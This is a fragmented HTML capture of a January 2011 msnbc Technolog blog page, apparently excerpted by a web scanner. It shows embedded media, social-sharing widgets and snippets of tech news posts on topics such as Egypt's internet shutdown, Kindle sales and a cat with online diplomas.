...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942421" data-contentId="5942421" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942421.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg" width="600" height="339" alt="" /><!-- end5942421 -->
...[SNIP]...
<em><a href="http://techcrunch.com/2011/01/28/egypt/">via TechCrunch</a>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
<em>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" data-Text="Jon Stewart questions Egypt's 'Twitter revolution'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>A spam message wishing a Russian woman happy new year may very well have killed her, and saved hundreds of intended targets, according to an account by <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html">The Telegraph's Moscow correspondent, Andrew Osborn</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" data-Text="Did spam text kill a Russian suicide bomber?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>The vast majority of urban Egyptians, 78 percent, feel that it is, according to a <a href="http://news.bbc.co.uk/2/hi/8548190.stm">BBC World Service survey</a>
...[SNIP]...
<p class="p1">"It's freedom of expression that is a long-standing core right,"&nbsp;Neil Hicks, international policy adviser for <a href="http://www.humanrightsfirst.org/">Human Rights First</a>
...[SNIP]...
<p class="p1">Outrage around the world centers on this issue. Cynthia Wong, international project director for the&nbsp;<a href="http://www.cdt.org/">Center for Democracy &amp; Technology</a>
...[SNIP]...
<p class="p1">But when <a href="http://gizmodo.com/5745478/is-internet-access-a-human-right">the same question was posed by our friend Joel Johnson on the tech blog Gizmodo</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" data-Text="Is Internet access a human right?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>"Under Egyptian legislation the authorities have the right to issue such an order and we are obliged to comply with it," Vodafone, one of the largest cell phone carriers, in Egypt, <a href="http://www.vodafone.com/content/index/press.html" target="_blank" class="vt-p">said in a statement</a>
...[SNIP]...
means because "what the government does is very effective for stopping the most basic users, meaning average users, the folks who probably aren't Twitter users," says Philip N. Howard, director of the <a href="http://www.pitpi.org/" target="_blank" class="vt-p">Project on Information Technology and Political Islam</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://twitter.com/malexjohnson">Follow M. Alex Johnson on Twitter</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964">Follow M. Alex Johnson on Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" data-Text="'This is about social networks that are beyond the reach of Mubarak'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941352" data-contentId="5941352" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="athima-chansanchai/5941352.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg" width="600" height="400" alt="" /><p class="photo_credit">
...[SNIP]...
<div id="vine-inlinePhoto__5941346" data-contentId="5941346" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941346.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg" width="280" height="420" alt="" /><div class="photo_credit_container">
...[SNIP]...
</a>, hoping the world won't see more photos like these (from <a href="http://www.flickr.com/photos/aljazeeraenglish/" target="_blank">Al Jazeera's Flickr photostream</a>
...[SNIP]...
<p>Searching for <a href="http://www.youtube.com/results?search_query=mubarak+protest&amp;aq=f" target="_blank">"Mubarak protest" on YouTube will yield hundreds of videos</a>, several taken in the last few days by news crews embedded in Egypt, as will "<a href="http://www.youtube.com/results?search_query=egypt+protest+2011&amp;aq=0sx" target="_blank">Egypt Protest 2011</a>
...[SNIP]...
<p>This video comes via a collection put together by <a href="http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/" target="_blank">Mashable</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/JORCXkSKvf0&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>And while attempts have been made to stifle Twitter and Facebook feeds, undeniable proof of the protests continue to come through, like this video, which I found from a Twitter link that led to a <a href="http://www.facebook.com/anarchismnews/posts/180233175348223" target="_blank">Facebook page</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/xnQgaMOZLRc&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/q_AF1t1KeZ8&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" data-Text="What the Egyptian government doesn't want you to see">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941467" data-contentId="5941467" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5941467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg" width="600" height="450" alt="" /><!-- end5941467 -->
...[SNIP]...
startling efficiency with which a government can isolate a country that has few telecom providers. The action is also far and above any previous any Internet shutdown connected to political unrest, as <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Jame's Cowie points out in the Renesys blog</a>
...[SNIP]...
<em><a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Renesys</a> via <a href="http://www.businessinsider.com/sai">Business Insider</a>
...[SNIP]...
<p>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" data-Text="Infograph: Egypt drops off the Internet">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941146" data-contentId="5941146" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941146.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg" width="280" height="93" alt="" /><!-- end5941146 -->
...[SNIP]...
<p>"I had the Facebook for one purpose &mdash;&nbsp;to keep in contact with my family," Fteja told <a href="http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html" target="_blank">The Daily News</a>
...[SNIP]...
<p>There are a lot of mines to step on that could result in Facebook shutting down someone's account, according to its <a href="http://www.facebook.com/terms.php" target="_blank">terms of service</a>
...[SNIP]...
<p>"I know one thing - I didn't do anything," he told <a href="http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK" target="_blank">The New York Post</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" data-Text="Facebook-deprived man sues for $500K">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940889" data-contentId="5940889" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5940889.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg" width="280" height="280" alt="" /><!-- end5940889 -->
...[SNIP]...
</a> we knew it'd only be a matter of time before we heard the announcement that Kindle books outsell paperback books. And now, about a month after that Kindle announcement, <a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=176060&amp;p=irol-newsArticle&amp;ID=1521090&amp;highlight=">it's here</a>
...[SNIP]...
<p>Since the beginning of the year, for every 100 paperback books Amazon has sold, the Company has sold 115 Kindle books. <a target="_blank" href="http://techcrunch.com/2010/07/19/kindle-sales/">In July, Kindle books surpassed hardcovers, selling 143 for every 100.</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" data-Text="Kindle books now outsell paperbacks">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940823" data-contentId="5940823" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5940823.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg" width="280" height="157" alt="" /><p class="photo_credit">
...[SNIP]...
</a>&nbsp;&mdash; but as of yesterday, the Egyptian government pretty much took the entire country offline. <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Here's what that looks like</a>
...[SNIP]...
<p>Meanwhile, the <a href="http://www.wired.com/threatlevel/2011/01/fbi-anonymous/">U.S. government knocked down dozens of doors </a>
...[SNIP]...
<p>It's now OK for photographers to take pictures outside public places and federal buildings &mdash; <a href="http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/">so there's, that</a>
...[SNIP]...
<p>Some dude on Staten Island is <a href="http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I">suing Facebook for $500,000 </a>
...[SNIP]...
<p>The white iPhone of legend made another short appearance &mdash; <a href="http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/">this time on the German Apple website </a>
...[SNIP]...
<p>Yeah, don't expect a lot of AT&amp;T iPhone subscribers to jump ship when Verizon's version rolls around &mdash; <a href="http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&amp;utm_source=twitterfeed&amp;utm_medium=twitter">90 percent of them are under contract</a>
...[SNIP]...
<p>Virgin is axing its <a href="http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html">unlimited mobile broadband plan</a>
...[SNIP]...
<p>Amazon now sells <a href="http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/">more Kindle books than paperbacks</a>
...[SNIP]...
<p>Hey! It's an online <a href="http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29">Sci Fi writing website from Star Ship Sofa</a>
...[SNIP]...
<span id="ppt19818077">"Man&nbsp;vs. Wild's" Bear Grylls vs. "Survivorman's" Les Stroud in an<a href="http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/"> Internet fight to the death! </a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" data-Text="Pre-caffeine tech: Man vs. the Internet!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>Computer scientist <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">Stephen Wolfram</a>, the brains behind <a target="_blank" href="http://www.wolframalpha.com/">WolframAlpha</a>, tested how often the correct answers to "Jeopardy" questions appear in the title or text snippets of the results page on <a target="_blank" href="http://www.google.com/">Google</a>, <a target="_blank" href="http://www.bing.com/">Bing</a>
...[SNIP]...
wer on its result page 69 percent of the time. Ask.com's page&nbsp;had the correct answer 68 percent of the time. Bing registered a 63 percent success rate, and&nbsp;Yandex&nbsp;came in at 62 percent. <a target="_blank" href="http://blekko.com/">Blekko</a> (58 percent) and <a target="_blank" href="http://en.wikipedia.org/wiki/Main_Page">Wikipedia</a>
...[SNIP]...
<p>That's where the <a target="_blank" href="http://www-03.ibm.com/innovation/us/watson/">IBM Watson</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/12rNbGf2Wwo&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
e is great&nbsp;for answering questions from unstructured data. This has potential real-world applications such as mining medical documents or patents, and doing discovery in litigation, he notes in a <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">blog post</a>
...[SNIP]...
<hr width="100%" size="2" align="center" />
<a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" data-Text="Search engines could play 'Jeopardy'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5936454" data-contentId="5936454" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5936454.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg" width="600" height="335" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Weary of "therapist-shopping clients" crowing about the many credentials of cut-rate counselors, and alarmed at how easy it is to obtain such credentials over the Internet, Dr. Eichel launched the "<a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">Cat Credentialing Project</a>
...[SNIP]...
<div id="vine-inlinePhoto__5936378" data-contentId="5936378" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5936378.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg" width="280" height="183" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>While Oreo may be the very first in her family to obtain a diploma, she's not alone in her species. Fraudulent diplomas among the house pet set are so popular, <a href="http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas">there&rsquo;s even a Wikipedia page that lists the honorees</a>
...[SNIP]...
<p>Learn more about the "Cat Credentialing Project" and how to find a qualified hypnotherapist <a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">on Dr. Eichel's website</a>
...[SNIP]...
<em><a href="http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist">via Gizmodo</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Get your fill of her blather on <a href="http://www.facebook.com/home.php#/profile.php?id=1151660271">Facebook</a> and <a href="http://twitter.com/HelenASPopkin">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" data-Text="Online degrees qualify cat to be your shrink">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<br />Twitter has been blocked in Egypt, but news about demonstrations, arrests and police retaliation are still being circulated on the Twitter hashtags <a href="http://twitter.com/#!/search?q=%23Egypt ">#Egypt</a>
...[SNIP]...
<p><a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html">Al Jazeera&rsquo;s staff </a>has compiled tweets on the protests.&nbsp;<a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html"></a>
...[SNIP]...
<br />Protesters continue to upload video, like this one of a man standing in front of a water-cannon truck, dubbing it, &ldquo;<a href="http://www.youtube.com/watch?v=YtTUsqra-MU ">Egypt&rsquo;s Tiananmen Square moment</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/YtTUsqra-MU&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>This <a href="http://www.youtube.com/">YouTube</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/Jjd6CGckke0&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<br />The English edition of the independent <a href="http://www.almasryalyoum.com/en/subchannel/Top%20stories">Egyptian newspaper Al-Masry Al-Youm</a>
...[SNIP]...
<p>The <a href="http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests">Guardian newspaper is live blogging </a>
...[SNIP]...
<p>Global Voices, an international community of bloggers, translates local social media into English and has a page dedicated to <a href="http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/ ">Egypt Protests 2011.</a>
...[SNIP]...
<br /><a href="http://english.aljazeera.net/">Al Jazeera</a>
...[SNIP]...
<p>The <a href="http://thelede.blogs.nytimes.com/">New York Times&rsquo; Lede blog</a>
...[SNIP]...
<p>The Council on Foreign Relations has coverage of the foreign policy implications with one of the Middle East experts, <a href="http://blogs.cfr.org/cook/">Steven Cook, blogging from Cairo</a>
...[SNIP]...
<p><a href="http://blogs.cfr.org/cook/"></a>Foreign Policy also has an interesting analysis on the million-dollar question: <a href="http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread">&ldquo;Will the Arab revolutions spread?&rdquo;</a>
...[SNIP]...
<p><a href="http://www.economist.com/node/18013760 ">The Economist</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" data-Text="Watching Egypt's protests">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
.33 million iPads. According to Ross Rubin at NPD, more than half were likely sold in the U.S. Let's say it's 4 million, for the sake of easy math. In that same quarter, AT&amp;T announced that it had <a href="http://www.att.com/gen/press-room?pid=18952&amp;cdvn=news&amp;newsarticleid=31519&amp;mapcode=financial">activated 442,000 3G iPads</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or join the conversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" data-Text="Don't worry, Wi-Fi-only tablets are coming">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
